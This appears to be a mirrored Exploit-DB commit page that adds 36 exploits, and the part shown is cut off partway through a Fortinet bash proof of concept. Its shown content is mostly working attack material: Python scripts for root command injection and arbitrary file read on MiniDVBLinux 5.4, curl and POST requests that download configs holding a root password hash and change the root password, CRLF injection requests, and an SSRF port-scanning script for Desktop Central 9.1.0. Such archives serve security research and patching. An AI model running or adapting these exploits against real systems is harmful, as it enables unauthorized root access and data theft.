bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-03-28

Browse source 
36 changes to exploits/shellcodes/ghdb

MiniDVBLinux 5.4  - Change Root Password
MiniDVBLinux 5.4  - Remote Root Command Injection
MiniDVBLinux 5.4 - Arbitrary File Read
MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
MiniDVBLinux <=5.4  - Config Download Exploit

Desktop Central 9.1.0 - Multiple Vulnerabilities

FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass
Aero CMS v0.0.1 - PHP Code Injection (auth)
Aero CMS v0.0.1 - SQL Injection (no auth)

Atom CMS v2.0 - SQL Injection (no auth)
Canteen-Management v1.0 - SQL Injection
Canteen-Management v1.0 - XSS-Reflected

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
WebTareas 2.4 - RCE (Authorized)
WebTareas 2.4 - Reflected XSS (Unauthorised)
WebTareas 2.4 - SQL Injection (Unauthorised)

WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities

Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

Grafana <=6.2.4 - HTML Injection

Hex Workshop v6.7 - Buffer overflow DoS

Scdbg 1.0 - Buffer overflow DoS

Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

AVS Audio Converter 10.3 - Stack Overflow (SEH)

Explorer32++ v1.3.5.531 - Buffer overflow

Frhed (Free hex editor) v1.6.0 - Buffer overflow

Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path

Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path

Resource Hacker v3.6.0.92 - Buffer overflow

Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path

WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
This commit is contained in:
Exploit-DB 2023-03-28 00:16:27 +00:00
parent 79023d1f9c
commit b137003172
36 changed files with 2724 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

73
exploits/hardware/remote/51091.txt Normal file
View file

@ -0,0 +1,73 @@
# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit
# Exploit Author: LiquidWorm
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application is vulnerable to unauthenticated configuration
download when direct object reference is made to the backup function
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.
====================================================================
/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:
------------------------------------------------------------
01: <?
02: if [ "$GET_action" = "getconfig" ]; then
03: . /etc/rc.config
04: header "Content-Type: application/x-compressed-tar"
05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"
06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null
07: cat /tmp/backup_config_$$.tgz
08: rm -rf /tmp/backup_config*
09: exit
10: fi
11: ?>
12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>
====================================================================
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5713
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php
24.09.2022
--
> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz
> mkdir configdir
> tar -xvzf config.tgz -C .\configdir
> cd configdir && cd etc
> type passwd
root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh
daemon:!:1:1::/:
ftp:!:40:2:FTP account:/:/bin/sh
user:!:500:500::/home/user:/bin/sh
nobody:!:65534:65534::/tmp:
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
>

53
exploits/hardware/remote/51093.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application allows the usage of the SVDRP protocol/commands
to be sent by a remote attacker to manipulate and/or control remotely
the TV.
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5714
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php
24.09.2022
--
Send a message to the TV screen:
curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU!
220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8
250 Message queued
221 mld closing connection
For more commands:
- https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands

156
exploits/hardware/remote/51094.txt Normal file
View file

@ -0,0 +1,156 @@
# Exploit Title: MiniDVBLinux 5.4 - Change Root Password
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Change Root Password PoC
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application allows a remote attacker to change the root
password of the system without authentication (disabled by default)
and verification of previously assigned credential. Command execution
also possible using several POST parameters.
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5715
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php
24.09.2022
--
Default root password: mld500
Change system password:
-----------------------
POST /?site=setup&section=System HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 778
Content-Type: application/x-www-form-urlencoded
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba
Host: ip:8008
Origin: http://ip:8008
Referer: http://ip:8008/?site=setup&section=System
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
sec-gpc: 1
APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+
Pretty post data:
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD: r00t
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Kumanovo
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: SYSTEM_PASSWORD
Eenable webif password check:
-----------------------------
POST /?site=setup&section=System HTTP/1.1
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
WEBIF_PASSWORD_CHECK: 1
action: save
params:
changed: WEBIF_PASSWORD_CHECK
Disable webif password check:
-----------------------------
POST /?site=setup&section=System HTTP/1.1
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: WEBIF_PASSWORD_CHECK

66
exploits/hardware/remote/51095.txt Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application suffers from an unauthenticated live stream
disclosure when /tpl/tv_action.sh is called and generates a snapshot
in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).
--------------------------------------------------------------------
/var/www/tpl/tv_action.sh:
--------------------------
01: #!/bin/sh
02:
03: header
04:
05: quality=60
06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"
07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null
--------------------------------------------------------------------
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5716
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php
24.09.2022
--
1. Generate screengrab:
- Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*"
- Response:
220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8
250 Grabbed image /tmp/tv.jpg 60
221 mld closing connection
2. View screengrab:
- Request: curl http://ip:8008/images/tv.jpg
3. Or use a browser:
- http://ip:8008/home?site=remotecontrol

67
exploits/hardware/remote/51096.py Executable file
View file

@ -0,0 +1,67 @@
# Exploit Title: MiniDVBLinux 5.4 - Remote Root Command Injection
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
#
#
# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability
#
#
# Vendor: MiniDVBLinux
# Product web page: https://www.minidvblinux.de
# Affected version: <=5.4
#
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
#
# Desc: The application suffers from an OS command injection vulnerability.
# This can be exploited to execute arbitrary commands with root privileges.
#
# Tested on: MiniDVBLinux 5.4
# BusyBox v1.25.1
# Architecture: armhf, armhf-rpi2
# GNU/Linux 4.19.127.203 (armv7l)
# VideoDiskRecorder 2.4.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5717
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php
#
#
# 24.09.2022
#
import requests
import re,sys
#test case 001
#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT
#test case 004
#http://ip:8008/?site=about&name=blind&file=$(id)
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory
#test case 005
#http://ip:8008/?site=about&name=blind&file=`id`
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory
if len(sys.argv) < 3:
print('MiniDVBLinux 5.4 Command Injection PoC')
print('Usage: ./mldhd_root2.py [url] [cmd]')
sys.exit(17)
else:
url = sys.argv[1]
cmd = sys.argv[2]
req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')
outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()
print(outz.replace('<pre>','').replace('</pre>',''))

61
exploits/hardware/remote/51097.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: MiniDVBLinux 5.4 - Arbitrary File Read
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
#
#
# MiniDVBLinux 5.4 Arbitrary File Read Vulnerability
#
#
# Vendor: MiniDVBLinux
# Product web page: https://www.minidvblinux.de
# Affected version: <=5.4
#
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
#
# Desc: The distribution suffers from an arbitrary file disclosure
# vulnerability. Using the 'file' GET parameter attackers can disclose
# arbitrary files on the affected device and disclose sensitive and system
# information.
#
# Tested on: MiniDVBLinux 5.4
# BusyBox v1.25.1
# Architecture: armhf, armhf-rpi2
# GNU/Linux 4.19.127.203 (armv7l)
# VideoDiskRecorder 2.4.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5719
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php
#
#
# 24.09.2022
#
import requests
import re,sys
#test case 001
#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT
if len(sys.argv) < 3:
print('MiniDVBLinux 5.4 File Disclosure PoC')
print('Usage: ./mldhd_fd.py [url] [file]')
sys.exit(17)
else:
url = sys.argv[1]
fil = sys.argv[2]
req = requests.get(url+'/?site=about&name=ZSL&file='+fil)
outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()
print(outz.replace('<pre>','').replace('</pre>',''))

234
exploits/jsp/webapps/51082.txt Normal file
View file

@ -0,0 +1,234 @@
# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-02-14
# Software Link : http://www.desktopcentral.com
# Tested Version: 9.1.0 (Build No: 91084)
# Tested on: Windows 10
# Vulnerability Type: CRLF injection (CRLF) - 1
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93
Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.csv.
Proof of concept:
GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost
Response:
HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv
X-dc-header: yes
Content-Length: 95
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
Content-Type: text/csv;charset=UTF-8
# Vulnerability Type: CRLF injection (CRLF) - 2
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93
Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.
Proof of concept:
GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost
HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013
X-dc-header: yes
Content-Length: 4470
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/pdf;charset=UTF-8
# Vulnerability Type: Server-Side Request Forgery (SSRF)
CVSS v3: 8.0
CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-918 Server-Side Request Forgery (SSRF)
Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability
in ManageEngine Desktop Central 9.1.0 allows an attacker can force a
vulnerable server to trigger malicious requests to third-party servers or
to internal resources. This vulnerability allows authenticated attacker
with network access via HTTP and can then be leveraged to launch specific
attacks such as a cross-site port attack, service enumeration, and various
other attacks.
Proof of concept:
Save this content in a python file (ex. ssrf_manageenginedesktop9.py),
change the variable sitevuln value with ip address:
import argparse
from termcolor import colored
import requests
import urllib3
import datetime
urllib3.disable_warnings()
print(colored('''
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
''',"red"))
def smtpConfig_ssrf(target,port,d):
now1 = datetime.datetime.now()
text = ''
sitevuln = 'localhost'
url = 'https://
'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%
40manageengine.com
&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%
40manageengine.com'
cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;
buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;
JSESSIONID=D10A9C62D985A0966647099E14C622F8;
DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'
try:
response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0
(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':
'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': '
https://192.168.56.250:8383/smtpConfig.do','Cookie':
cookie,'Connection': 'keep-alive'},verify=False, timeout=10)
text = response.text
now2 = datetime.datetime.now()
rest = (now2 - now1)
seconds = rest.total_seconds()
if ('updateRefMsgCookie' in text):
return colored('Cookie lost',"yellow")
if d == "0":
print ('Time response: ' + str(rest) + '\n' + text + '\n')
if (seconds > 5.0):
return colored('open',"green")
else:
return colored('closed',"red")
except:
now2 = datetime.datetime.now()
rest = (now2 - now1)
seconds = rest.total_seconds()
if (seconds > 10.0):
return colored('open',"green")
else:
return colored('closed',"red")
return colored('unknown',"yellow")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -
SSRF Open ports",required=True)
parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9
- SSRF Open ports",required=True)
parser.add_argument('-d','--debug', help="ManageEngine Desktop Central
9 - SSRF Open ports (0 print or 1 no print)",required=False)
args = parser.parse_args()
timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)
print (args.ip + ':' + args.port + ' ' + timeresp + '\n')
And:
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
192.168.56.250:8080 open
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
192.168.56.250:7777 closed

55
exploits/multiple/webapps/51092.sh Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)
# Date: 13/10/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.fortinet.com/
# Version:
#FortiOS from 7.2.0 to 7.2.1
#FortiOS from 7.0.0 to 7.0.6
#FortiProxy 7.2.0
#FortiProxy from 7.0.0 to 7.0.6
#FortiSwitchManager 7.2.0
#FortiSwitchManager 7.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-40684
# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass
# Usage: ./poc.sh <ip> <port>
# Example: ./poc.sh 10.10.10.120 8443
#!/bin/bash
red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"
yellow="\e[0;33m\033[1m"
end="\033[0m\e[0m"
target=$1
port=$2
vuln () {
echo -e "${yellow}[+] Dumping System Information: ${end}"
timeout 10 curl -s -k -X $'GET' \
